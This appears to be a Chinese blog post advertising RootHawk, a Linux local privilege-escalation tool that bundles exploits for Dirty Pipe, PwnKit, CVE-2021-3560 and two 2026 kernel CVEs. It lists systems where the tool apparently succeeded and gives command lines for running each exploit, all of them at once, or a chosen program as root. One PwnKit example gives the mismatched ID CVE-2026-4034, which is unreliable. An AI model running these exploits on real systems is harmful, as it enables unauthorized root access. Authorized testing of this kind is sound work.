Linux 本地提权工具支持Linux 内核和 Polkit 漏洞

工具介绍

RootHawk 是一个用于授权安全测试 的 Linux 本地提权工具。它整合了多个已公开的 Linux 内核和 Polkit 漏洞,目的是在可控环境(虚拟机、实验环境、授权目标机器)中验证系统是否存在提权风险。

复制代码
https://github.com/RoadBicycle-C/RootHawk

支持的主要漏洞(CVE)

CVE 编号 常见名称/别名 漏洞类型/组件
CVE-2026-31431 Copy Fail Linux Kernel 本地提权,涉及 crypto / AF_ALG / algif_aead 相关逻辑问题。
CVE-2026-43284 Dirty Frag,也有人叫 CopyFail2 Linux Kernel 本地提权,涉及 xfrm/esp、shared skb frags 等内核网络/数据包处理路径。
CVE-2021-4034 PwnKit Polkit 的 pkexec 本地提权漏洞。
CVE-2021-3560 Polkit D-Bus 权限绕过 / Polkit Authentication Bypass Polkit 本地提权,可通过 D-Bus 请求绕过凭据检查,提升权限;没有像 PwnKit 那样特别统一的短名字。
CVE-2022-0847 Dirty Pipe Linux Kernel 本地提权,管道机制相关漏洞。

工具采用模块化设计,每个 CVE 都有独立实现,可以单独运行或一次性尝试所有模块。

主要功能特点

  • 支持命令行参数快速调用特定 CVE(-e CVE-XXXX-XXXX
  • 支持一键运行所有可用漏洞(-any
  • 可列出所有可用模块(-list
  • 支持自定义参数(如 pkexec 路径、备份 su、后渗透执行命令等)
  • 提供详细日志输出(-v
  • 预编译二进制文件(支持 amd64、arm64、386 架构)
  • 已在多个国产系统上测试通过:
    • AnolisOS
    • openEuler
    • 统信 UOS(统信桌面操作系统)
    • openKylin(开放麒麟)
    • Ubuntu、CentOS 7 等

工具测试

序号 操作系统 测试漏洞 测试结果 说明
1 AnolisOS CVE-2026-31431 / Copy Fail ✅ 成功 工具在该系统环境下测试通过
2 openEuler CVE-2026-31431 / Copy Fail ✅ 成功 工具在该系统环境下测试通过
3 统信 UOS CVE-2026-31431 / Copy Fail ✅ 成功 工具在该系统环境下测试通过
4 openKylin CVE-2026-31431 / Copy Fail ✅ 成功 工具在该系统环境下测试通过
5 Ubuntu CVE-2026-31431 / Copy Fail ✅ 成功 工具在该系统环境下测试通过
6 CentOS 7 CVE-2021-4034 / PwnKit ✅ 成功 工具在该系统环境下测试通过

信创系统openEuler

DirtyFrag

bash 复制代码
./RootHawk-amd64 -e CVE-2026-43284

CopyFai

复制代码
./RootHawk-amd64 -e CVE-2026-31431

CVE-2021-4034

复制代码
./RootHawk-amd64 -e CVE-2026-4034

工具使用

已编译版本

text 复制代码
bin/RootHawk-amd64
bin/RootHawk-arm64
bin/RootHawk-386

Ubuntu amd64 虚拟机使用:

bash 复制代码
chmod +x RootHawk-amd64
./RootHawk-amd64 -help

查看帮助:

bash 复制代码
./RootHawk-amd64 -help

查看模块列表:

bash 复制代码
./RootHawk-amd64 -list

执行指定 CVE:

bash 复制代码
./RootHawk-amd64 -e CVE-2022-0847

按顺序执行全部模块:

bash 复制代码
./RootHawk-amd64 -any

参数说明

text 复制代码
-list              显示当前集成的 CVE 模块
-e <名称>          执行指定 CVE 或别名
-any               按列表顺序执行全部模块
-pk <路径>         指定 CVE-2021-4034 使用的 pkexec 路径,默认 /usr/bin/pkexec
-backup <路径>     CVE-2026-31431 执行前备份 su 到指定路径
-exec <路径>       CVE-2026-31431 提权后执行指定程序,而不是进入 su
-v                 尽量输出详细日志
-help              显示帮助

示例

bash 复制代码
./RootHawk-amd64 -list
./RootHawk-amd64 -e CVE-2021-4034
./RootHawk-amd64 -e CVE-2021-4034 -pk /usr/bin/pkexec
./RootHawk-amd64 -e CVE-2026-31431 -backup /tmp/su.bak
./RootHawk-amd64 -e CVE-2026-31431 -backup /tmp/su.bak -exec /tmp/root-task
./RootHawk-amd64 -e CVE-2026-43284 -v
./RootHawk-amd64 -any

总结

RootHawk 是一个比较新的、专注 Linux 本地提权的开源安全测试工具,集成了多个真实 CVE。它适合有一定 Linux 和安全基础的用户在实验环境中学习和验证提权技术。

网络安全情报攻防站

www.libaisec.com

综合性的技术交流与资源共享社区

专注于红蓝对抗、攻防渗透、威胁情报、数据泄露

相关推荐
SkyWalking中文站43 分钟前
认识 Horizon UI · 5/17:3D 基础设施地图
运维·监控·自动化运维
tntxia18 小时前
linux curl命令详解_curl详解
linux
扛枪的书生20 小时前
Linux 网络管理器用法速查
linux
SkyWalking中文站1 天前
认识 Horizon UI · 1/17:SkyWalking 新一代可观测性控制台
运维·前端·监控
顺风尿一寸1 天前
Java Socket 内核之旅:从 SocketChannel.read() 到 tcp_recvmsg 与 epoll 的完整调用链路
linux
雪梨酱QAQ1 天前
Kubeneters HA Cluster部署
运维
江华森1 天前
Spring Cloud 微服务全栈实战:从 Eureka 到 Docker Compose 一文贯通
运维
江华森1 天前
Matplotlib 数据绘图基础入门
运维
XIAOHEZIcode1 天前
Ubuntu 终端美化全栈指南:Bash 到 Kitty 踩坑实录
linux·ubuntu·命令行
江华森1 天前
NumPy 数值计算基础入门
运维